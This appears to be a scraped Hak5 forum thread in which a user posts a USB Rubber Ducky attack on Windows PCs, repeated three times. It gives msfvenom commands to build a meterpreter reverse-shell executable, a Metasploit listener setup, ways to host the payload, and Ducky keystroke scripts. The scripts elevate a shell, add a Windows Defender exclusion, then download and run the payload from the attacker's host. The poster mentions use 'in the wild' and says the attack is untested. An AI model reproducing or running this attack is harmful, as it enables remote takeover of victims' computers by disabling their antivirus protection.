Phosgene

So the last time I did this I hosted the payload on a server on my pc, now you can just use port forward 8888 (If you plan on using this in the wild) Create the payload cd ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe Host the Payload on 000webhost.com (Just make an account and upload the payload using the file manager). Start your listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your public ip> set LPORT 8888 set ExitOnSession false exploit -j -z Posted June 3 So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip) ports that need to be port forwarded 8888 & 8080 Heres the setup proc: (I use parrot sec os) Create the payload cd ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe Start the PHP server sudo php -S 0.0.0.0:8080 -t ~ Start your listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your public ip> set LPORT 8888 set ExitOnSession false exploit -j -z Heres The Ducky Script DELAY 350 GUI r DELAY 100 STRING cmd /c "curl -o 'C:\users\exploit.exe' 'https:URL\exploit.exe' && powershell Add-MpPreference -ExclusionPath 'C:\users' && C:\users\exploit.exe" ENTER Please comment if there are any problems I Havent tested this yet! But it practically happens instantly............

Also I havent tested this I dont have a usb rubber duck or any hak5 gear so you guys can test it!

So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip) ports that need to be port forwarded 8888 & 8080 Heres the setup proc: (I use parrot sec os) Create the payload cd ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe Start the PHP server sudo php -S 0.0.0.0:8080 -t ~ Start your listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your public ip> set LPORT 8888 set ExitOnSession false exploit -j -z Heres The Ducky Script DELAY 350 GUI r DELAY 100 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 150 ALT y STRING powershell Add-MpPreference -ExclusionPath "C:\users" ENTER DELAY 100 STRING curl -o "C:\users\exploit.exe" "http://< your public ip>:8080/exploit.exe" ENTER DELAY 100 STRING start C:\users\exploit.exe ENTER DELAY 100 STRING exit ENTER and done!

Oh, sorry I am new to the hak5 forums I just like breaking windows, will do!

So this is a usb rubber ducky attacking in roughly .9 to 2.3 seconds NOTE: THIS REQUIRES PORT FORWARDING ( to use your ip address public ip) ports that need to be port forwarded 8888 & 8080 Heres the setup proc: (I use parrot sec os) Create the payload cd ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your public ip> LPORT=8888 -f exe > exploit.exe Start the PHP server sudo php -S 0.0.0.0:8080 -t ~ Start your listener msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <your public ip> set LPORT 8888 set ExitOnSession false exploit -j -z Heres The Ducky Script DELAY 350 GUI r DELAY 100 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 150 ALT y STRING powershell Add-MpPreference -ExclusionPath "C:\users" ENTER DELAY 100 STRING curl -o "C:\users\exploit.exe" "http://< your public ip>:8080/exploit.exe" ENTER DELAY 100 STRING start C:\users\exploit.exe ENTER DELAY 100 STRING exit ENTER and done!